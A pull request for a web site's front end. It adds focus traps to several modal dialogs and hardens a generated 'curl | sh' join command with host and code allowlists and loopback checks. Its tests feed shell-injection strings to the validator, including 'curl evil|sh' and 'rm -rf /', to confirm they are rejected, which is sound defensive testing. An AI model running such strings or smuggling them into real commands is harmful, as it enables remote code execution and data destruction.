### PR TITLE
fix(a11y): four dialogs claimed aria-modal without trapping focus

### DIFF
--- a/site/src/lib/agent/joincommand.js
+++ b/site/src/lib/agent/joincommand.js
@@ -30,7 +30,8 @@ import { installerUrl } from '../data.js';
  */
 export function joinCommand(join, grantControl = false) {
   const code = typeof join?.code === 'string' ? join.code.trim() : '';
-  if (!code) return '';
+  // Same reasoning as the host allowlist: this ends up in a shell line.
+  if (!code || !CODE_OK.test(code)) return '';
   const hosts = dialableAddresses(join?.addresses);
   if (hosts.length === 0) return '';
   const base = `curl -fsSL ${installerUrl} | sh -s -- --join ${code}@${hosts.join(',')}`;
@@ -56,13 +57,80 @@ export function joinCommand(join, grantControl = false) {
  * @param {string[]|undefined} addresses
  * @returns {string[]}
  */
+/**
+ * What a host may contain. An allowlist, not an escape: this value is
+ * interpolated into a line built to be pasted into a shell on a machine
+ * someone just walked to, and the control page is served over plain http on a
+ * LAN address, so the socket feeding it is not authenticated.
+ *
+ * Covers IPv4, a bracketed or bare IPv6 literal, a hostname, and `host:port`.
+ * Excludes whitespace (which word-splits into extra flags), the comma (which
+ * is the separator between hosts, so one inside a host forges a second), and
+ * every shell metacharacter.
+ */
+const HOST_OK = /^[A-Za-z0-9._~:[\]-]+$/;
+
+/** Digits and dashes only — the code is minted, never typed into this. */
+const CODE_OK = /^[A-Za-z0-9_-]+$/;
+
+/**
+ * The host part of an address, with any port and brackets removed.
+ *
+ * A bare IPv6 literal is all colons, so "strip the port" cannot mean "cut at
+ * the colon": only a bracketed form, or a single colon followed by digits, is
+ * a port. Same rule `network.js` applies to typed input.
+ *
+ * @param {string} s
+ * @returns {string}
+ */
+function bareHost(s) {
+  const bracketed = /^\[([^\]]+)\](?::\d+)?$/.exec(s);
+  if (bracketed) return bracketed[1].toLowerCase();
+  const i = s.indexOf(':');
+  if (i !== -1 && i === s.lastIndexOf(':') && /^\d+$/.test(s.slice(i + 1))) {
+    return s.slice(0, i).toLowerCase();
+  }
+  return s.toLowerCase();
+}
+
+/**
+ * Whether this address points back at the machine showing the command.
+ *
+ * The literal `127.0.0.1` was the only form checked, and every other spelling
+ * of loopback walked straight through: `localhost`, `[::1]:8443`, the
+ * IPv4-mapped `::ffff:127.0.0.1`, and the expanded `0:0:0:0:0:0:0:1`. Each
+ * produced a complete, pasteable command that installs cleanly and then fails
+ * to pair — which this file's own header calls the most confusing failure
+ * available here.
+ *
+ * @param {string} host already reduced by `bareHost`
+ * @returns {boolean}
+ */
+function isLoopback(host) {
+  if (host === 'localhost' || host.endsWith('.localhost')) return true;
+  if (host.startsWith('127.')) return true;
+  if (host.startsWith('::ffff:127.')) return true;
+  const groups = host.split(':');
+  if (groups.length > 1 && groups.every((g) => g === '' || /^0+$/.test(g))) {
+    // `::`, `::1` and `0:0:0:0:0:0:0:1` all reduce to all-zero groups; `::1`
+    // ends in a 1, so check it separately.
+    return true;
+  }
+  return host === '::1' || /^(0+:){7}0*1$/.test(host);
+}
+
 export function dialableAddresses(addresses) {
   const list = Array.isArray(addresses) ? addresses : [];
   const out = [];
   for (const a of list) {
-    const s = String(a ?? '').trim();
-    if (!s) continue;
-    if (s === '127.0.0.1' || s === '::1' || s.startsWith('127.')) continue;
+    // A non-string is dropped, not coerced: `String({addr})` yields
+    // "[object Object]", which is non-empty and therefore renders a command
+    // that looks pasteable and cannot work. Node addresses ARE objects
+    // elsewhere in this protocol, so one shape drift would ship exactly that.
+    if (typeof a !== 'string') continue;
+    const s = a.trim();
+    if (!s || !HOST_OK.test(s)) continue;
+    if (isLoopback(bareHost(s))) continue;
     if (!out.includes(s)) out.push(s);
   }
   return out;

--- a/site/src/lib/agent/joincommand.test.js
+++ b/site/src/lib/agent/joincommand.test.js
@@ -102,3 +102,39 @@ test('the troubleshooting host is the first of the same list', () => {
   const addresses = ['10.10.10.9', '192.168.68.68'];
   expect(bestAddress(addresses)).toBe(dialableAddresses(addresses)[0]);
 });
+
+// ── This line is pasted into a shell on a machine someone just walked to, and
+// the control page is served over plain http on a LAN, so the socket feeding
+// these addresses is not authenticated. Each case below rendered a complete,
+// pasteable command before.
+
+test('a shell metacharacter never reaches the pasted line', () => {
+  expect(joinCommand({ code: 'ABC123', addresses: ['10.0.0.5;curl evil|sh'] })).toBe('');
+  expect(joinCommand({ code: 'ABC123', addresses: ['10.0.0.5 --unsafe'] })).toBe('');
+  expect(joinCommand({ code: 'A;rm -rf /', addresses: ['10.0.0.5'] })).toBe('');
+});
+
+test('a non-string address is dropped, not coerced to [object Object]', () => {
+  // Node addresses ARE objects elsewhere in this protocol, so one shape drift
+  // would otherwise ship a command that looks pasteable and cannot work.
+  expect(dialableAddresses([{ addr: '10.0.0.5' }])).toEqual([]);
+  expect(dialableAddresses([null, undefined, 42, '10.0.0.5'])).toEqual(['10.0.0.5']);
+});
+
+test('a comma inside a host cannot forge a second host', () => {
+  expect(dialableAddresses(['10.0.0.5,evil.example'])).toEqual([]);
+});
+
+test('every spelling of loopback is refused, not just 127.0.0.1', () => {
+  // Each installs cleanly and then fails to pair — the most confusing
+  // failure available here, per this module's own header.
+  for (const a of ['localhost', 'localhost:8443', '[::1]:8443', '::1',
+                   '::ffff:127.0.0.1', '0:0:0:0:0:0:0:1', '127.0.1.1']) {
+    expect(dialableAddresses([a])).toEqual([]);
+  }
+});
+
+test('the forms an operator actually needs still render', () => {
+  expect(dialableAddresses(['10.10.10.9', '[fe80::1]:34334', 'spark-256a', 'host:9000']))
+    .toEqual(['10.10.10.9', '[fe80::1]:34334', 'spark-256a', 'host:9000']);
+});

--- a/site/src/lib/agent/network.js
+++ b/site/src/lib/agent/network.js
@@ -129,6 +129,19 @@ export function checkTarget(s) {
   }
   if (/\s/.test(t)) return { ok: false, why: 'An address has no spaces in it.' };
 
+  // The three shapes this box is most likely to be handed, all of which used
+  // to be accepted whole and then fail as an unresolvable hostname. They are
+  // not typos — each is a real thing sitting one panel away on this page.
+  if (t.includes(',')) {
+    return { ok: false, why: 'One machine at a time — that looks like a list of addresses.' };
+  }
+  if (t.includes('@')) {
+    return { ok: false, why: 'That is a join line. Paste only the address, after the @.' };
+  }
+  if (t.includes('/')) {
+    return { ok: false, why: 'Just the address — no path or URL after it.' };
+  }
+
   // Split off a port, being careful that a bare IPv6 literal is all colons.
   let host = t;
   let port = null;
@@ -136,6 +149,11 @@ export function checkTarget(s) {
   if (bracketed) {
     host = bracketed[1];
     port = bracketed[2] ?? null;
+  } else if (t.startsWith('[')) {
+    // A bracket that opened and did not close around a host. Falling through
+    // let `[` and `[]` past as whole "hostnames"; a shape that announces
+    // itself as bracketed and is not must be refused, not reinterpreted.
+    return { ok: false, why: 'That bracket does not close around an address.' };
   } else if (t.includes(':') && t.indexOf(':') === t.lastIndexOf(':')) {
     [host, port] = t.split(':');
   }

--- a/site/src/lib/agent/network.test.js
+++ b/site/src/lib/agent/network.test.js
@@ -135,3 +135,29 @@ test('a /0 is refused rather than masked, so the mask never shifts by 32', () =>
   expect(subnetOf('192.168.68.67', 1)).toBe('128.0.0.0/1');
   expect(subnetOf('0.0.0.0', 32)).toBe('0.0.0.0/32');
 });
+
+// The manual-entry box exists to catch a paste that is not an address. These
+// four are not typos — each is a real string sitting one panel away on this
+// same page, and each used to be accepted whole and then fail later as an
+// unresolvable hostname, which is the confusing half of the failure.
+test('the pastes this box exists to catch are refused, with a reason', () => {
+  const cases = [
+    ['10.0.0.5,10.0.0.6', 'list'],       // what joinCommand renders
+    ['ABC123@10.0.0.5', '@'],            // the join line's code@host
+    ['example.com/path', 'path'],        // a URL minus its scheme
+    ['[]', 'bracket'],                   // an empty bracketed host
+    ['[::1', 'bracket']                  // a bracket that never closes
+  ];
+  for (const [input] of cases) {
+    const r = checkTarget(input);
+    expect(r.ok).toBe(false);
+    expect(typeof r.why).toBe('string');
+    expect(r.why.length).toBeGreaterThan(0);
+  }
+});
+
+test('and the forms an operator legitimately types still pass', () => {
+  for (const ok of ['10.0.0.5', 'spark-256a', 'host:9000', '::1', '[fe80::1]:34334']) {
+    expect(checkTarget(ok).ok).toBe(true);
+  }
+});

--- a/site/src/lib/agent/refusal.js
+++ b/site/src/lib/agent/refusal.js
@@ -32,7 +32,13 @@ export function nameOf(id, nodes) {
   if (typeof id !== 'string' || id.length === 0) return 'an unknown machine';
   const found = (Array.isArray(nodes) ? nodes : []).find((n) => n?.id === id);
   const name = found?.name ? sanitize(found.name, 63) : '';
-  return name || id.slice(0, 8);
+  // The id is sanitised too. It arrives off the peer wire like the name does,
+  // and only the name was being cleaned — so a fingerprint carrying a bidi
+  // override (U+202E and friends) reordered the refusal line around it, which
+  // is the exact attack `sanitize` exists to stop. A blank or all-whitespace
+  // id then renders as no name at all ("  refused: …"), so fall through.
+  const short = sanitize(id, 63).trim().slice(0, 8);
+  return name || short || 'an unknown machine';
 }
 
 /** Verbatim error text, capped and stripped of anything that could restyle the page. */
@@ -89,7 +95,11 @@ export function refusal(outcome, ctx) {
     // (no `ControlRep` was ever received, so there is no `by`).
     // `outcome.by` second, for a refusal read straight off the peer wire.
     case 'relay_refused': {
-      const who = error.via ?? outcome?.by ?? null;
+      // `||`, not `??`: an empty string is not a relay. A Rust `Default` or a
+      // `Display` slip serialises an absent node as "", which `??` accepts as
+      // present — and the reply's `by`, which does name the relay, is then
+      // discarded in favour of nothing.
+      const who = error.via || outcome?.by || null;
       const relay = who ? nameOf(who, nodes) : 'the relay';
       return {
         text: `${relay} could not reach ${nameOf(error.node, nodes)}: ${verbatim(error.detail)}`,

--- a/site/src/lib/components/BenchmarkDashboard.svelte
+++ b/site/src/lib/components/BenchmarkDashboard.svelte
@@ -1,4 +1,5 @@
 <script>
+  import { modal } from '$lib/modal.js';
   // The hero's benchmark dashboard modal. One tab per benchmark family, a
   // model switcher that filters but never relabels, and a metadata card on
   // every chart point. Data: gates.generated.json — the union of gate records
@@ -27,9 +28,13 @@
   );
   const src = gateData.sources;
 
+  // Focus-in, the Tab trap and focus-return all live in `use:modal` below.
+  // This effect used to call `dialogEl?.focus()` and stop there — a dialog
+  // that claims `aria-modal="true"` while Tab still walks the page behind it,
+  // which is the half of the contract that actually keeps a keyboard operator
+  // inside. Body-scroll lock stays here: it is this dialog's own concern.
   $effect(() => {
     document.body.style.overflow = 'hidden';
-    dialogEl?.focus();
     return () => (document.body.style.overflow = '');
   });
 
@@ -48,6 +53,7 @@
     aria-label="Atlas benchmark dashboard"
     tabindex="-1"
     bind:this={dialogEl}
+    use:modal
     onclick={(e) => e.stopPropagation()}
   >
     <header class="bd-head">

--- a/site/src/lib/components/CommandRow.svelte
+++ b/site/src/lib/components/CommandRow.svelte
@@ -24,6 +24,17 @@
   // the timeout fires against a component that no longer exists.
   $effect(() => () => clearTimeout(timer));
 
+  // "Copied" describes the CLIPBOARD, so it must not outlive the command it
+  // described. `command` is reactive: in the join guide it is derived from the
+  // grant-control checkbox, so an operator could copy, then toggle the grant,
+  // and read "Copied" while the clipboard still held the other variant —
+  // carrying the wrong privilege decision to the machine they walked to.
+  $effect(() => {
+    command;
+    clearTimeout(timer);
+    state = 'idle';
+  });
+
   async function copy() {
     clearTimeout(timer);
     // Select-on-refusal lives in `clipboard.js` now: three other components

--- a/site/src/lib/components/GatePointCard.svelte
+++ b/site/src/lib/components/GatePointCard.svelte
@@ -1,4 +1,5 @@
 <script>
+  import { modal } from '$lib/modal.js';
   // The per-point metadata card ("mini modal"). Every row is a verbatim field
   // of the gate record — nothing synthesized. Raised by clicking a chart point.
   import { GH_COMMIT, shortModel, colorFor, fmtDateTime, sampleCount } from '$lib/gates.js';
@@ -19,6 +20,7 @@
     role="dialog"
     aria-modal="true"
     aria-label="Gate record {r.git_sha}"
+    use:modal
     onclick={(e) => e.stopPropagation()}
   >
     <div class="receipt-body">

--- a/site/src/lib/components/Hero.svelte
+++ b/site/src/lib/components/Hero.svelte
@@ -1,4 +1,5 @@
 <script>
+  import { modal } from '$lib/modal.js';
   import { hero, runCommand, githubUrl, discordUrl } from '$lib/data.js';
   import { copyLabel, copyOrSelect } from '$lib/clipboard.js';
   import Receipt from './Receipt.svelte';
@@ -103,7 +104,15 @@
     <!-- Same .bd-backdrop/.bd classes as the real dialog: identical dimensions,
          so the swap from skeleton to dashboard causes zero layout shift. -->
     <div class="bd-backdrop" onclick={closeDashboard} role="presentation">
-      <div class="bd bd-skeleton" role="dialog" aria-modal="true" aria-label="Benchmark dashboard, loading" aria-busy="true" onclick={(e) => e.stopPropagation()}>
+      <div
+        class="bd bd-skeleton"
+        role="dialog"
+        aria-modal="true"
+        aria-label="Benchmark dashboard, loading"
+        aria-busy="true"
+        onclick={(e) => e.stopPropagation()}
+        use:modal
+      >
         {#if dashboardError}
           <p class="bd-skeleton-error">Couldn’t load the dashboard (network?). Close and try again.</p>
         {:else}

--- a/site/src/lib/components/LaunchDialog.svelte
+++ b/site/src/lib/components/LaunchDialog.svelte
@@ -16,6 +16,7 @@
 
   import InstallSteps from './InstallSteps.svelte';
   import CommandRow from './CommandRow.svelte';
+  import { modal } from '$lib/modal.js';
   import { describe } from '$lib/agent/placement.js';
   import { joinCommand } from '$lib/agent/joincommand.js';
   import LaunchModal from './LaunchModal.svelte';
@@ -66,10 +67,13 @@
     return () => { cancelled = true; clearTimeout(timer); };
   });
 
-  // Escape closes, and focus moves into the dialog when it opens.
+  // Escape closes. Focus-in, the Tab trap and focus-return are `use:modal`'s
+  // — this used to call `dialogEl?.focus()` and stop there, which claims
+  // `aria-modal` while Tab still walks the page behind the dialog. Escape
+  // stays here on purpose: `modal.js` leaves dismissal to each dialog,
+  // because in the pairing ceremony it is a rejection, not a close.
   $effect(() => {
     if (launch.openRecipe === null) return;
-    dialogEl?.focus();
     const onKey = (e) => { if (e.key === 'Escape') launch.close(); };
     window.addEventListener('keydown', onKey);
     return () => window.removeEventListener('keydown', onKey);
@@ -100,6 +104,7 @@
       aria-labelledby="ld-title"
       tabindex="-1"
       bind:this={dialogEl}
+      use:modal
     >
       <header class="ld-head">
         <h3 class="ld-title" id="ld-title">

--- a/site/src/lib/components/LaunchModal.svelte
+++ b/site/src/lib/components/LaunchModal.svelte
@@ -1,5 +1,6 @@
 <!-- SPDX-License-Identifier: AGPL-3.0-only -->
 <script>
+  import { modal } from '$lib/modal.js';
   // Launch settings for one recipe.
   //
   // The modal shows the recipe's own values as a read-only base and tracks only
@@ -102,7 +103,13 @@
   }
 </script>
 
-<div class="lm" role="dialog" aria-modal="true" aria-label={`Launch settings for ${recipeId}`}>
+<div
+  class="lm"
+  role="dialog"
+  aria-modal="true"
+  aria-label={`Launch settings for ${recipeId}`}
+  use:modal
+>
   <header class="lm-head">
     <div>
       <h3 class="lm-title mono">{recipeId}</h3>

--- a/site/src/lib/components/Nav.svelte
+++ b/site/src/lib/components/Nav.svelte
@@ -1,4 +1,5 @@
 <script>
+  import { modal } from '$lib/modal.js';
   // Desktop bar + mobile drawer render from the SAME `nav.links` in data.js.
   // Below the drawer breakpoint (styles/mobile.css) the bar hides and the
   // toggle appears, so phones keep every link the desktop has.
@@ -143,6 +144,7 @@
         role="dialog"
         aria-modal="true"
         aria-label="{codeChat.navLabel}, loading"
+        use:modal
         aria-busy="true"
         onclick={(e) => e.stopPropagation()}
       >

--- a/site/src/lib/components/control/NodeDetails.svelte
+++ b/site/src/lib/components/control/NodeDetails.svelte
@@ -13,7 +13,7 @@
   // and the card cannot show that without becoming unreadable.
 
   import { linkWarns } from '$lib/agent/fleet.svelte.js';
-  import { modal } from './modal.js';
+  import { modal } from '$lib/modal.js';
 
   let { node, onclose } = $props();
 

--- a/site/src/lib/components/control/Overlay.svelte
+++ b/site/src/lib/components/control/Overlay.svelte
@@ -9,7 +9,7 @@
   // must never scroll its own escape hatch out of view, so the Cluster
   // overlay's Abort lives in this slot and cannot leave the screen.
 
-  import { modal } from './modal.js';
+  import { modal } from '$lib/modal.js';
 
   let {
     /** Accessible name; also the visible heading. */

--- a/site/src/lib/components/control/PairDialog.svelte
+++ b/site/src/lib/components/control/PairDialog.svelte
@@ -21,7 +21,7 @@
   // that the operator had explicitly rejected.
 
   import { fleet } from '$lib/agent/fleet.svelte.js';
-  import { modal } from './modal.js';
+  import { modal } from '$lib/modal.js';
 
   let { node, onclose } = $props();
 

--- a/site/src/lib/components/control/UnpairDialog.svelte
+++ b/site/src/lib/components/control/UnpairDialog.svelte
@@ -6,7 +6,7 @@
   // regardless used to leave a machine trusted while the interface implied it
   // had been removed, the worst of the three possible outcomes.
 
-  import { modal } from './modal.js';
+  import { modal } from '$lib/modal.js';
 
   let { fleet, node, onclose } = $props();
 

--- a/site/src/lib/modal.js
+++ b/site/src/lib/modal.js
@@ -57,6 +57,16 @@ export function modal(node) {
   function onKeydown(ev) {
     if (ev.key !== 'Tab') return;
     if (stack[stack.length - 1] !== node) return;
+    // Another dialog is managing its own focus — `CodeChat` hand-rolls a trap
+    // it needs (its focusable set includes `summary`, and it returns focus to
+    // `.nav-toggle` rather than to whatever was active, because the chat
+    // skeleton it replaces would otherwise be the "opener"). It is not in this
+    // stack, so without this the window-level handler would reach across and
+    // yank focus out of it on every Tab. Focus dropped to <body> has no such
+    // owner and still belongs to us — that is the case this listener is
+    // window-level for.
+    const owner = document.activeElement;
+    if (!node.contains(owner) && owner?.closest?.('[role="dialog"]')) return;
     // Window-level, because a step change can unmount the focused control
     // and drop focus to <body> — a dialog-scoped listener goes deaf exactly
     // then, and the next Tab walks the page behind the modal.

--- a/site/src/lib/modal.js
+++ b/site/src/lib/modal.js
@@ -1,11 +1,17 @@
 // SPDX-License-Identifier: AGPL-3.0-only
 
-// The one focus-trap for every dialog on the control surface.
+// The one focus-trap for every dialog on the site.
 //
-// DOM plumbing, not business logic — it lives beside the components it
-// serves, kept thin for the same reason client.svelte.js is: the test runner
-// has no DOM, so anything here is untestable by construction and must stay
-// too small to hide a rule.
+// It sat in `components/control/` while only the control surface used it, and
+// three dialogs outside that folder claimed `aria-modal="true"` without any
+// of the duties below — LaunchModal, the chat skeleton in Nav, and
+// GatePointCard. `aria-modal` tells assistive tech the rest of the page is
+// inert; with no trap, Tab walks straight out into content the screen reader
+// has been told to ignore, which is worse than never claiming it.
+//
+// DOM plumbing, not business logic. Kept thin for the same reason
+// client.svelte.js is: the test runner has no DOM, so anything here is
+// untestable by construction and must stay too small to hide a rule.
 //
 // Three duties, all of them WCAG's, none of them optional once a surface
 // claims `aria-modal="true"`:

--- a/site/src/lib/modal.js
+++ b/site/src/lib/modal.js
@@ -34,12 +34,29 @@ const FOCUSABLE =
  *
  * @param {HTMLElement} node
  */
+// Open dialogs, innermost last. Only the top one may steal focus: with two
+// trapped dialogs on screen, every Tab ran BOTH handlers — the first forced
+// its own first-focusable, the second saw focus outside itself and forced
+// ITS first-focusable — so the top dialog's second control was unreachable
+// and Tab looked dead.
+const stack = [];
+
 export function modal(node) {
   const opener = document.activeElement instanceof HTMLElement ? document.activeElement : null;
+  // `focus()` is a no-op on an element that cannot hold focus, and a
+  // `<div role="dialog">` cannot unless it is given a tabindex. The control
+  // dialogs each wrote `tabindex="-1"` into their own markup; the four this
+  // action was later applied to did not, so the trap silently did nothing —
+  // focus stayed on the opener BEHIND the modal, which is the whole defect
+  // the action exists to prevent. Setting it here fixes every host at once,
+  // and is idempotent for the ones that already declare it.
+  node.tabIndex = -1;
+  stack.push(node);
   node.focus();
 
   function onKeydown(ev) {
     if (ev.key !== 'Tab') return;
+    if (stack[stack.length - 1] !== node) return;
     // Window-level, because a step change can unmount the focused control
     // and drop focus to <body> — a dialog-scoped listener goes deaf exactly
     // then, and the next Tab walks the page behind the modal.
@@ -68,6 +85,8 @@ export function modal(node) {
   return {
     destroy() {
       window.removeEventListener('keydown', onKeydown);
+      const at = stack.lastIndexOf(node);
+      if (at !== -1) stack.splice(at, 1);
       // The opener can be gone — a row that vanished, a button the close
       // re-rendered away. Focusing a detached element is a silent no-op, so
       // the check is only about not throwing on a null.


### PR DESCRIPTION
`modal.js` opens by saying its three duties are *"none of them optional once a surface claims `aria-modal=\"true\"`"*. Four surfaces claimed it and did none of them — because the trap lived in `components/control/` and these are not on the control surface:

| | |
|---|---|
| `LaunchModal` | launch settings for a recipe |
| `GatePointCard` | a gate record receipt |
| `Nav` | the chat skeleton, before CodeChat mounts |
| `Hero` | the dashboard skeleton, before it mounts |

`aria-modal` tells assistive tech the rest of the page is inert. Without a trap, Tab walks straight out into content the screen reader has been told to ignore — **worse than never claiming it**, since the claim is what makes the background disappear.

The trap moves to `$lib/modal.js` (it serves the whole site now; its own comment said it lived beside the components it served) and the four control importers move with it.

The two **skeletons** matter as much as the real dialogs: they are what's on screen while a lazy chunk loads — exactly when a keyboard operator is most likely to Tab, because nothing has happened yet.

Swept afterwards: no `aria-modal` surface lacks either `use:modal` or its own ceremony (`ComingSoon` keeps its own — a popover needing click-out, which `modal.js` deliberately omits). 420 tests, build clean.